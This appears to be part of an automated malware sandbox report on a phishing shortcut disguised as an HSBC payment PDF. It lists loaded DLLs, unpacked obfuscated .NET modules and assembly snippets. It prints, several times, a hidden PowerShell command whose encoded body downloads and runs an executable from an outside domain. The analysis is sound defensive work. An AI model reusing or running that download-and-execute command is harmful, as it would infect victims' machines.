Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: kernel.appcore.dll

Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Payment Advice__HSBC Banking.pdf.lnk

LNK file: ..\..\..\..\..\Windows\System32\cmd.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

.NET source code contains potential unpacker

Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, D9EudLlbHv2APZOL2i.cs	.Net Code: FgBnpdUPj1 System.Reflection.Assembly.Load(byte[])
Source: 3.2.PuttyTest777.pif.50c0000.5.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 3.2.PuttyTest777.pif.50c0000.5.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, D9EudLlbHv2APZOL2i.cs	.Net Code: FgBnpdUPj1 System.Reflection.Assembly.Load(byte[])
Source: 3.2.PuttyTest777.pif.26ed44c.0.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 3.2.PuttyTest777.pif.26ed44c.0.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, D9EudLlbHv2APZOL2i.cs	.Net Code: FgBnpdUPj1 System.Reflection.Assembly.Load(byte[])

PowerShell case anomaly found

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g			Jump to behavior

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

17_2_0041A8DA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B873714 pushad ; ret	2_2_00007FFD9B873721
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F304EA push edx; ret	3_2_06F304EB
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F32C98 push es; iretd	3_2_06F32C9C
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_00D001B5 push esp; iretd	12_2_00D001B3
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D204EA push edx; ret	12_2_06D204EB
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D22C98 push es; iretd	12_2_06D22C9C
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D268F9 pushfd ; iretd	12_2_06D268FA
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D268B0 pushfd ; iretd	12_2_06D268B2
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_004000D8 push es; iretd	17_2_004000D9
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0040008C push es; iretd	17_2_0040008D
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_004542E6 push ecx; ret	17_2_004542F9
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0045B4FD push esi; ret	17_2_0045B506
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00432BD6 push ecx; ret	17_2_00432BE9
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00454C08 push eax; ret	17_2_00454C26

Source: PuttyTest777.pif.2.dr	Static PE information: section name: .text entropy: 7.9098783782347315
Source: HODoCxSdp.exe.3.dr	Static PE information: section name: .text entropy: 7.9098783782347315

Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, zLRx0Krvxpl94Gmelc.cs	High entropy of concatenated method names: 'EQB4L53l8P', 'gnK4ZijvRb', 'foC4gMcnln', 'URD4ilVIrQ', 'MHI4mNNXXH', 'RXg4w8t06r', 'Next', 'Next', 'Next', 'NextBytes'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, JV8COMjuieAqErQMuGa.cs	High entropy of concatenated method names: 'jPpRUlBDat', 'RCjR0ikxwX', 'hV5RpFi5pq', 'uIPNh1ovZZDc03eJ9OK', 'McMdE6oHLhe1bMWnNWV', 'oSuCUIok5xYAhNTgSrd'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, EtsJobhTeXI6X3UQ5n.cs	High entropy of concatenated method names: 'MZR5mbDnbO', 'sYs59UpbPG', 'ELE5Xl8Wmn', 'Gf25ISiCqV', 'kgg5rFZ9Zn', 'uXw5MmuTXG', 'ALS5C8Z78G', 'PeY5fAgDIq', 'sB25tZqQGv', 'yk55B2GSHp'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, D9EudLlbHv2APZOL2i.cs	High entropy of concatenated method names: 'CNbQJAcVb5', 's7uQPiP1Cs', 'qCwQ5Sp0qi', 'BVUQHwjPCD', 'ekFQjGeXhY', 'v30QVXIgIu', 'ud1Q2dwpK7', 'wnqQhrb0hj', 'BxDQOIYIJh', 'VtdQEP7W9w'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, j18cpQf7mkuHRbXFpl.cs	High entropy of concatenated method names: 'o272UcYVjI', 'IkQ20KqGI7', 'Bee2pXQMjH', 'eQj2DQTdAe', 'Vs82lUAkMh', 'eri2df75Ei', 'enW2xG6Nqv', 'S8j2NLVOuN', 'eTe2usWXRI', 'AN92Y3wW2o'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, A70MiS059eBQ79exbu.cs	High entropy of concatenated method names: 'xiNqN60YdT', 'LsBqutc1Jf', 'ih3qLluX1e', 'wygqZDmxIU', 'DZoqiQTcjH', 'IlpqwxYBX6', 'vFfqcvBwNL', 'Fbsq6YhC0F', 'l2oqom147T', 'r0qqAKAP8x'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, Fb16UU9rwEUap37uVW.cs	High entropy of concatenated method names: 'FO04PKlfRI', 'jtU45fpDLC', 'DBu4HERWIw', 'Ltb4jyWZr8', 'Bqo4VHukoc', 'KB942SWca1', 'X5n4hIjV45', 'SiG4OqU4E6', 'egg4E3Aepp', 'ScE4KkkTcJ'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, dYK3NXtpx6kd8ZccpM.cs	High entropy of concatenated method names: 'AHX2PbPYFU', 'KeI2H6kBnq', 'sFL2VyVWur', 'SKfVBCmeuB', 'HVUVz1l4Mo', 'HLO27IrPX5', 'CW328M4t48', 'kww2kq2nm0', 'Uxm2Q4Jw3K', 'oxT2n6vIIk'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, BoJSG7UDrVhUJiyNwB.cs	High entropy of concatenated method names: 'DpRTfK5287', 'y0XTB4lLio', 'jrN47Xag86', 'xqb48vHkqF', 'j1uTAE4QRk', 'kQDTaRHeAr', 'aECTF8Weda', 'TjKTmx7eui', 'qSuT9B5KRF', 'GFZTXiXn6X'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, eghuitF4yljFm0lKkM.cs	High entropy of concatenated method names: 'zZh82TnHuT', 'b8e8hMmqKB', 'FUu8EXaogP', 'KLJ8KekqrH', 'aFL8W4Tdeg', 'jLO8y34GqS', 'jwPwoL7htqxuauRScp', 'zYAZtv4O4FkTpx5eq8', 'kog881ZcJ9', 'Va58QI35Ca'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, RrYOk9jcPYBpJRwhDsY.cs	High entropy of concatenated method names: 'eAtSUwHgN2', 'LwrS0ieXrT', 'oZdSpgB5k3', 'pssSDPaBpW', 'VdMSlgpCkY', 'QoeSd330D1', 'tAgSxaElHl', 'CXiSNCPynd', 'omhSu8iVjP', 'qItSYsSmXe'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, qIHWAkuExOeaUujlqY.cs	High entropy of concatenated method names: 'WSgpEZ4MG', 'X6UDM5hF3', 'BfEdO9uBN', 'LRqxPSlJ5', 'vsku4ysYV', 'ghdYeYsQy', 'yl6Xhbv0h2JfbU7SqD', 'mZx6j6HlhTU3SgfsrJ', 'v9L4nd4Dp', 'eVJRli8Gy'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, JailI0yyD3oy9EWXGR.cs	High entropy of concatenated method names: 'nTaVJ9JO6e', 'SWjV5n3nAB', 'zXpVjSMBLu', 'RKbV2HJW6u', 'svEVhUYkvp', 'Yt8jr9vG3w', 'lwFjMpPhK0', 'qVQjCOCcbM', 'mMZjfc8u4e', 'Eehjtkoi7n'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, RbFpxOjX2gByO9bfJbc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9DRmYdvGC', 'O0XR93NS9h', 'm6wRXmrjtq', 'I2pRIsfTlx', 'O9ORrH7n5H', 'tCjRM8qwpH', 'b9URC6kjV5'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, mo2uG0YjKHD1aiAviU.cs	High entropy of concatenated method names: 'UvHTEHYYRJ', 'xR8TKpmMlK', 'ToString', 'A4ZTPOih7A', 'QkET5GVwmu', 'gu0THvvNke', 'YFXTjDiylY', 'gb4TVh1Q16', 'aFOT2UhtuD', 'vVmThxoyny'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, j6B1wyQDUGbllhbbhO.cs	High entropy of concatenated method names: 'VALS8kp83n', 'hvISQYk9SH', 'FsXSnrS7WN', 'VS4SPoOcB5', 'iMXS5uwhRi', 'Nm3SjJEEYI', 'L3mSVG9KxB', 'qEE4CCL2ZQ', 'E2a4fOuEEW', 'qCP4tSb5AP'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, CMxTafJa09SU85L67A.cs	High entropy of concatenated method names: 'esvjlLBaiq', 'jXGjx8b1RM', 'n7THglFIai', 'fgMHilYg5D', 'vOrHw7VjY1', 'qGvH1dRGHH', 'C2gHcxbfRd', 'lCTH6hxnQl', 'LouHbHacFB', 'H7jHoLOMJx'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, fYR6BysfY0DiREaAo2.cs	High entropy of concatenated method names: 'bgdHDJcNPO', 'J9yHdcj4VN', 'TxZHN31kqQ', 'pSiHuGeLiT', 'juRHWDlrnJ', 'HKYHyXayuI', 'xryHT3oB1K', 'in0H4pscok', 'Pf4HSvybJh', 'h2xHROBbm0'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, dMl8TwIyBpNEgmJauT.cs	High entropy of concatenated method names: 'MAjWoYxX44', 'JD4Wa9YnPK', 'paaWmQOT91', 'ecIW9tEfWO', 'DGjWZHl3We', 'fGmWgna66x', 'mx4WiedG3y', 'dfPWwhj2mN', 'U3KW1AwCCZ', 'QdFWcLbt4N'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, rOQN4VeudJysxd8645.cs	High entropy of concatenated method names: 'Dispose', 'n7n8tvTYUg', 'tEQkZNpeyR', 'FlJGGYUBaQ', 'xqv8BeqsIM', 'Xrd8zIRogm', 'ProcessDialogKey', 'wmOk7vSu2J', 'K0rk85TTNo', 'Rflkk4Vh95'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, c2cMNMpYDGGCdGPNCV.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fMnktTLXLy', 'f53kB1Hs3W', 'doAkzhdZEP', 'mUqQ75Unh6', 'tWcQ8Tq8ZZ', 'B3XQkgGALn', 'Sh9QQDBC6G', 'u1BxKpDoTTSW2HrvqNF'
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, BET2H7355jyJGS9kPV.cs	High entropy of concatenated method names: 'WQXVXXtMaL', 'uZxVId6NHp', 'DGlVrk8KL0', 'ToString', 'Wb9VMxA98E', 'y28VCOoJbB', 'BxaQYaYaJ5p7YgiDttw', 'hUXs4fY3fCmSojIpZeM', 'swZrCyY2AfjqaO2L7UG'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, zLRx0Krvxpl94Gmelc.cs	High entropy of concatenated method names: 'EQB4L53l8P', 'gnK4ZijvRb', 'foC4gMcnln', 'URD4ilVIrQ', 'MHI4mNNXXH', 'RXg4w8t06r', 'Next', 'Next', 'Next', 'NextBytes'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, JV8COMjuieAqErQMuGa.cs	High entropy of concatenated method names: 'jPpRUlBDat', 'RCjR0ikxwX', 'hV5RpFi5pq', 'uIPNh1ovZZDc03eJ9OK', 'McMdE6oHLhe1bMWnNWV', 'oSuCUIok5xYAhNTgSrd'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, EtsJobhTeXI6X3UQ5n.cs	High entropy of concatenated method names: 'MZR5mbDnbO', 'sYs59UpbPG', 'ELE5Xl8Wmn', 'Gf25ISiCqV', 'kgg5rFZ9Zn', 'uXw5MmuTXG', 'ALS5C8Z78G', 'PeY5fAgDIq', 'sB25tZqQGv', 'yk55B2GSHp'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, D9EudLlbHv2APZOL2i.cs	High entropy of concatenated method names: 'CNbQJAcVb5', 's7uQPiP1Cs', 'qCwQ5Sp0qi', 'BVUQHwjPCD', 'ekFQjGeXhY', 'v30QVXIgIu', 'ud1Q2dwpK7', 'wnqQhrb0hj', 'BxDQOIYIJh', 'VtdQEP7W9w'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, j18cpQf7mkuHRbXFpl.cs	High entropy of concatenated method names: 'o272UcYVjI', 'IkQ20KqGI7', 'Bee2pXQMjH', 'eQj2DQTdAe', 'Vs82lUAkMh', 'eri2df75Ei', 'enW2xG6Nqv', 'S8j2NLVOuN', 'eTe2usWXRI', 'AN92Y3wW2o'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, A70MiS059eBQ79exbu.cs	High entropy of concatenated method names: 'xiNqN60YdT', 'LsBqutc1Jf', 'ih3qLluX1e', 'wygqZDmxIU', 'DZoqiQTcjH', 'IlpqwxYBX6', 'vFfqcvBwNL', 'Fbsq6YhC0F', 'l2oqom147T', 'r0qqAKAP8x'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, Fb16UU9rwEUap37uVW.cs	High entropy of concatenated method names: 'FO04PKlfRI', 'jtU45fpDLC', 'DBu4HERWIw', 'Ltb4jyWZr8', 'Bqo4VHukoc', 'KB942SWca1', 'X5n4hIjV45', 'SiG4OqU4E6', 'egg4E3Aepp', 'ScE4KkkTcJ'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, dYK3NXtpx6kd8ZccpM.cs	High entropy of concatenated method names: 'AHX2PbPYFU', 'KeI2H6kBnq', 'sFL2VyVWur', 'SKfVBCmeuB', 'HVUVz1l4Mo', 'HLO27IrPX5', 'CW328M4t48', 'kww2kq2nm0', 'Uxm2Q4Jw3K', 'oxT2n6vIIk'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, BoJSG7UDrVhUJiyNwB.cs	High entropy of concatenated method names: 'DpRTfK5287', 'y0XTB4lLio', 'jrN47Xag86', 'xqb48vHkqF', 'j1uTAE4QRk', 'kQDTaRHeAr', 'aECTF8Weda', 'TjKTmx7eui', 'qSuT9B5KRF', 'GFZTXiXn6X'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, eghuitF4yljFm0lKkM.cs	High entropy of concatenated method names: 'zZh82TnHuT', 'b8e8hMmqKB', 'FUu8EXaogP', 'KLJ8KekqrH', 'aFL8W4Tdeg', 'jLO8y34GqS', 'jwPwoL7htqxuauRScp', 'zYAZtv4O4FkTpx5eq8', 'kog881ZcJ9', 'Va58QI35Ca'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, RrYOk9jcPYBpJRwhDsY.cs	High entropy of concatenated method names: 'eAtSUwHgN2', 'LwrS0ieXrT', 'oZdSpgB5k3', 'pssSDPaBpW', 'VdMSlgpCkY', 'QoeSd330D1', 'tAgSxaElHl', 'CXiSNCPynd', 'omhSu8iVjP', 'qItSYsSmXe'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, qIHWAkuExOeaUujlqY.cs	High entropy of concatenated method names: 'WSgpEZ4MG', 'X6UDM5hF3', 'BfEdO9uBN', 'LRqxPSlJ5', 'vsku4ysYV', 'ghdYeYsQy', 'yl6Xhbv0h2JfbU7SqD', 'mZx6j6HlhTU3SgfsrJ', 'v9L4nd4Dp', 'eVJRli8Gy'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, JailI0yyD3oy9EWXGR.cs	High entropy of concatenated method names: 'nTaVJ9JO6e', 'SWjV5n3nAB', 'zXpVjSMBLu', 'RKbV2HJW6u', 'svEVhUYkvp', 'Yt8jr9vG3w', 'lwFjMpPhK0', 'qVQjCOCcbM', 'mMZjfc8u4e', 'Eehjtkoi7n'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, RbFpxOjX2gByO9bfJbc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9DRmYdvGC', 'O0XR93NS9h', 'm6wRXmrjtq', 'I2pRIsfTlx', 'O9ORrH7n5H', 'tCjRM8qwpH', 'b9URC6kjV5'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, mo2uG0YjKHD1aiAviU.cs	High entropy of concatenated method names: 'UvHTEHYYRJ', 'xR8TKpmMlK', 'ToString', 'A4ZTPOih7A', 'QkET5GVwmu', 'gu0THvvNke', 'YFXTjDiylY', 'gb4TVh1Q16', 'aFOT2UhtuD', 'vVmThxoyny'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, j6B1wyQDUGbllhbbhO.cs	High entropy of concatenated method names: 'VALS8kp83n', 'hvISQYk9SH', 'FsXSnrS7WN', 'VS4SPoOcB5', 'iMXS5uwhRi', 'Nm3SjJEEYI', 'L3mSVG9KxB', 'qEE4CCL2ZQ', 'E2a4fOuEEW', 'qCP4tSb5AP'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, CMxTafJa09SU85L67A.cs	High entropy of concatenated method names: 'esvjlLBaiq', 'jXGjx8b1RM', 'n7THglFIai', 'fgMHilYg5D', 'vOrHw7VjY1', 'qGvH1dRGHH', 'C2gHcxbfRd', 'lCTH6hxnQl', 'LouHbHacFB', 'H7jHoLOMJx'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, fYR6BysfY0DiREaAo2.cs	High entropy of concatenated method names: 'bgdHDJcNPO', 'J9yHdcj4VN', 'TxZHN31kqQ', 'pSiHuGeLiT', 'juRHWDlrnJ', 'HKYHyXayuI', 'xryHT3oB1K', 'in0H4pscok', 'Pf4HSvybJh', 'h2xHROBbm0'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, dMl8TwIyBpNEgmJauT.cs	High entropy of concatenated method names: 'MAjWoYxX44', 'JD4Wa9YnPK', 'paaWmQOT91', 'ecIW9tEfWO', 'DGjWZHl3We', 'fGmWgna66x', 'mx4WiedG3y', 'dfPWwhj2mN', 'U3KW1AwCCZ', 'QdFWcLbt4N'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, rOQN4VeudJysxd8645.cs	High entropy of concatenated method names: 'Dispose', 'n7n8tvTYUg', 'tEQkZNpeyR', 'FlJGGYUBaQ', 'xqv8BeqsIM', 'Xrd8zIRogm', 'ProcessDialogKey', 'wmOk7vSu2J', 'K0rk85TTNo', 'Rflkk4Vh95'
